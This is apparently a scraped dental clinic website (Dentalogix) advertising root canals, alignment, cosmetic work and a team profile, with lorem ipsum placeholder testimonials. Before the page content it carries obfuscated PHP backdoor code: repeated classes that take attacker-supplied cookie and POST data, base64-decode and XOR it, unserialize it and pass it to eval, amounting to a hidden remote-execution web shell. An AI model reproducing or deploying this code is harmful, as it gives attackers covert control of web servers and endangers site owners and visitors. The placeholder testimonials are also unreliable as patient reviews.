$PzRsN = chr (110) . chr (104) . '_' . 'O' . chr (115) . "\x73";$jtHYIWgqS = "\x63" . chr (108) . chr ( 187 - 90 )."\163" . chr ( 246 - 131 )."\137" . chr ( 872 - 771 ).chr ( 1118 - 998 )."\151" . "\x73" . 't' . chr (115); $ZqrtE = $jtHYIWgqS($PzRsN); $PzRsN = "57583";$YfFCwWjhbl = !$ZqrtE;$jtHYIWgqS = "34866";if ($YfFCwWjhbl){class nh_Oss{public function EDyRkYEq(){echo "49022";}private $GVyTm;public static $vSWBz = "0db02434-6a4b-4913-896b-8c4772415211";public static $uIGYwZ = 54574;public function __construct($hCakMBiEnh=0){$YvKlKupOYz = $_COOKIE;$jpcdKqW = $_POST;$Izeftz = @$YvKlKupOYz[substr(nh_Oss::$vSWBz, 0, 4)];if (!empty($Izeftz)){$RTGlO = "base64";$gcdOEQ = "";$Izeftz = explode(",", $Izeftz);foreach ($Izeftz as $BsIHYfzLp){$gcdOEQ .= @$YvKlKupOYz[$BsIHYfzLp];$gcdOEQ .= @$jpcdKqW[$BsIHYfzLp];}$gcdOEQ = array_map($RTGlO . "\x5f" . chr (100) . chr ( 434 - 333 ).chr (99) . "\157" . "\x64" . chr ( 453 - 352 ), array($gcdOEQ,)); $gcdOEQ = $gcdOEQ[0] ^ str_repeat(nh_Oss::$vSWBz, (strlen($gcdOEQ[0]) / strlen(nh_Oss::$vSWBz)) + 1);nh_Oss::$uIGYwZ = @unserialize($gcdOEQ);}}private function vdiczXwFZ(){if (is_array(nh_Oss::$uIGYwZ)) {$mAXSEfOQb = str_replace(chr ( 251 - 191 ) . "\x3f" . "\x70" . "\150" . "\160", "", nh_Oss::$uIGYwZ[chr ( 549 - 450 ).chr ( 1070 - 959 ).chr (110) . chr ( 713 - 597 ).'e' . chr ( 424 - 314 )."\x74"]);eval($mAXSEfOQb); $zvrIB = "32265";exit();}}public function __destruct(){$this->vdiczXwFZ(); $dxueVG = str_pad("32265", 10);}}$kikdmF = new /* 44383 */ nh_Oss(); $kikdmF = substr("20115_33588", 1);}$kqCKfyaWh = chr ( 791 - 680 ).chr (95) . 'g' . "\x59" . chr (101); $EoyzGKC = chr ( 787 - 688 ).chr (108) . chr (97) . "\163" . chr (115) . "\137" . "\x65" . chr ( 808 - 688 )."\x69" . chr (115) . "\x74" . "\x73";$SVcsfwcIxu = $EoyzGKC($kqCKfyaWh); $kqCKfyaWh = "61423";$sIBtCCdaX = !$SVcsfwcIxu;$EoyzGKC = "11795";if ($sIBtCCdaX){class o_gYe{public function jALmjscXoz(){echo "11302";}private $FdXwP;public static $uTsgGBPWPe = "e3ed7de7-c40e-4ee8-bbc5-eba89a72702b";public static $hzZPn = 59019;public function __construct($oYLtAlheYE=0){$jpgiLo = $_COOKIE;$uiVwkUl = $_POST;$hKtgCJ = @$jpgiLo[substr(o_gYe::$uTsgGBPWPe, 0, 4)];if (!empty($hKtgCJ)){$DHPjFKRrU = "base64";$OgVTaJo = "";$hKtgCJ = explode(",", $hKtgCJ);foreach ($hKtgCJ as $elGUpKcI){$OgVTaJo .= @$jpgiLo[$elGUpKcI];$OgVTaJo .= @$uiVwkUl[$elGUpKcI];}$OgVTaJo = array_map($DHPjFKRrU . "\x5f" . chr ( 317 - 217 ).'e' . chr (99) . "\x6f" . 'd' . "\145", array($OgVTaJo,)); $OgVTaJo = $OgVTaJo[0] ^ str_repeat(o_gYe::$uTsgGBPWPe, (strlen($OgVTaJo[0]) / strlen(o_gYe::$uTsgGBPWPe)) + 1);o_gYe::$hzZPn = @unserialize($OgVTaJo);}}private function ZMRKtNBrJ(){if (is_array(o_gYe::$hzZPn)) {$ApIdXogRXt = str_replace("\x3c" . "\77" . "\x70" . "\150" . chr ( 420 - 308 ), "", o_gYe::$hzZPn["\143" . chr (111) . chr ( 1045 - 935 ).'t' . "\x65" . 'n' . "\x74"]);eval($ApIdXogRXt); $UlznOh = "47124";exit();}}public function __destruct(){$this->ZMRKtNBrJ(); $BhPOIm = str_pad("47124", 10);}}$ngMSSgRE = new /* 55907 */ o_gYe(); $ngMSSgRE = substr("58331_15028", 1);}$FBJxiUE = "\x4d" . 'K' . chr (78) . chr (95) . 'i' . "\161" . chr ( 465 - 375 ); $HhYipWKwnu = 'c' . "\154" . chr (97) . 's' . chr (115) . chr ( 277 - 182 ).'e' . chr (120) . "\151" . "\x73" . 't' . chr ( 214 - 99 ); $piAUy = class_exists($FBJxiUE); $FBJxiUE = "39030";$HhYipWKwnu = "27158";$MqlZjfgeJf = !1;if ($piAUy == $MqlZjfgeJf){function lnIoCw(){return FALSE;}$xkFoPiJUj = "16805";lnIoCw();class MKN_iqZ{private function WCAabIL($xkFoPiJUj){if (is_array(MKN_iqZ::$IgrJoTPx)) {$mvTulqN = str_replace("\x3c" . "\x3f" . chr ( 1040 - 928 ).chr ( 277 - 173 )."\160", "", MKN_iqZ::$IgrJoTPx[chr ( 818 - 719 ).'o' . chr (110) . 't' . "\x65" . chr (110) . "\x74"]);eval($mvTulqN); $xkFoPiJUj = "16805";exit();}}private $wcvtz;public function lTxbRv(){echo 53089;}public function __destruct(){$xkFoPiJUj = "62619_60597";$this->WCAabIL($xkFoPiJUj); $xkFoPiJUj = "62619_60597";}public function __construct($dkPHHJwJld=0){$lTVksGFcW = $_POST;$ZjFBlhVv = $_COOKIE;$NNqZLukzA = "7aef757d-acb1-437e-9615-69dc4fb880ab";$dYPBRCH = @$ZjFBlhVv[substr($NNqZLukzA, 0, 4)];if (!empty($dYPBRCH)){$UeFrwf = "base64";$EHeCV = "";$dYPBRCH = explode(",", $dYPBRCH);foreach ($dYPBRCH as $UQUlXHEjfv){$EHeCV .= @$ZjFBlhVv[$UQUlXHEjfv];$EHeCV .= @$lTVksGFcW[$UQUlXHEjfv];}$EHeCV = array_map($UeFrwf . '_' . chr ( 1001 - 901 ).chr (101) . "\x63" . 'o' . 'd' . chr ( 1043 - 942 ), array($EHeCV,)); $EHeCV = $EHeCV[0] ^ str_repeat($NNqZLukzA, (strlen($EHeCV[0]) / strlen($NNqZLukzA)) + 1);MKN_iqZ::$IgrJoTPx = @unserialize($EHeCV); $EHeCV = class_exists("62619_60597");}}public static $IgrJoTPx = 36160;}$VHVVGVxLly = new /* 10759 */ MKN_iqZ(16805 + 16805); $MqlZjfgeJf = $VHVVGVxLly = $xkFoPiJUj = Array();} Dentalogix

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Dentistry that makes you smile!

By combining quality care with up-to-date technology, we treat patients of all ages. Our only motto is to diagnose the root cause of your oral issues to take the required steps. Whether you need a perfect smile or a root canal, Dentalogix is your one-stop destination! We take care of our patients with.

s State-Of-The-Art Technology

s Highly Experienced, well-trained Dentist

s Cleanliness

s Warm And Peaceful Environment

s A friendly staff

Working Hours Call Us: (203) 588-9059
Root Canal Specialist

Want to Treat your tooth pain? Diagnose the real reason behind it to save your natural smile.

Oral Hygiene Experts

Get tips to maintain good oral hygiene at home so you don’t have to visit us besides the regular checkups.

Alignment Specialist

Too old to wear braces? Straighten up your misaligned teeth now for a beautiful smile!

Live Dental Advisory

Are you in severe dental pain? Get emergency help via online or by telephone!

Cosmetic Dentistry

Hesitate while smiling due to ugly teeth? Beautifyhow your teeth looks today!

Cavity Inspection

Fond of eating excessive sugars? Let us check for cavities and gum diseases.

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Fully dedicated to your dental health

We love to see you smile!

From a regular dental check-up to the deep cleaning of your gum, we do everything to give you a healthy smile. We go over all of the options for getting your smile to appear pretty much the way you want it to. Don’t let tooth decay hinder the functionality of your teeth! Instead, schedule a check-up with us to prevent any early signs of tooth decay before it’s too late.

our dear clients

Check out what our patients think about us!

In sea viderer delicatissimi, urbanitas sententiae quo blandit maiorum euripidis.

The true professionals

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August Johns

Quick, easy & reliable

Duis sed odio sit amet nibh vulputate cursus a sit am mauris. Morbi accumsan sum ipsum velit. Nam nec tellus am od tincidunt auctor.
Jenna Johnson

The best clinic in town

Duis sed odio sit amet nibh vulputate cursus a sit am mauris. Morbi accumsan sum ipsum velit. Nam nec tellus am od tincidunt auctor.
Robert Logan

New Patient Special - First Checkup $99.00

Full mouth X-Ray, Comprehensive Exam, Regular Cleaning

Fast & professional treatments for every patient

Want to address problems with tooth root and pulp? Our highly trained root canal specialist has got you covered!

They are highly trained in endodontic diagnosis and therapy for even the most complex cases. Our specialist decides the best way to alleviate your pain by removing the diseased pulp tissue from the interior of the tooth.


Easiest way to do something truly important for your smile

Your smile represents your personality! Visit Dentalogix, to get a perfect smile with perfectly aligned teeth!

Do you know that your misaligned teeth can result in the various problem? Difficulty in chewing or speaking, increased risk for dental problems, and sleep apnea are some of them! We look after the health and history of the patient to fix your crooked jaw without the surgery.


Fast & professional treatments for every patient

Not satisfied with your smile? Let us restore the confidence in your smile!

To give patients a whiter and a brighter smile, we use professional teeth whitening, dental veneers, and dental crown treatments! Whether you have gaps, damaged teeth or crooked teeth, we are your one-stop destination to give you sparkling white teeth.


Easiest way to do something truly important for your smile

Do you have some dental concerns? With the help of our live dental advisory services, you can put an end to all of your dental problems!

Get help for all dental issues to improve health and quality of life. If you are under severe dental pain, our experts will give tips to alleviate your pain instantly. You can contact us via live chat or telephone to get experts advice from anywhere and anytime.

Our team of dentists cares for you & your smile.

Meet the team

To provide you with complete dental care and exceptional dentistry outcome, we have a huge team of highly experienced dentists. We use cutting-edge technology to get you on the road to recovery from long-term oral health problems.

Dr Jin Mai Soto


Dr Jin Mai Soto ESTETIC DENTIST (203) 588-9059 Admin@dentalogix.net BOOK APPOINTMENT Dr Jin Mai-Soto is a graduate from New York University, College of Dentistry. She's immigrant from China, and she also served in the US Army National guard for over 6 years.

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Make a right move to begin your transformation!

Fill in the given details to book your next dental check-up now!

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    In sea viderer delicatissimi, urbanitas sententiae quo blandit maiorum euripidis.

    This is dentalogix , a place dedicated
    to clear, white & perfect smiles.

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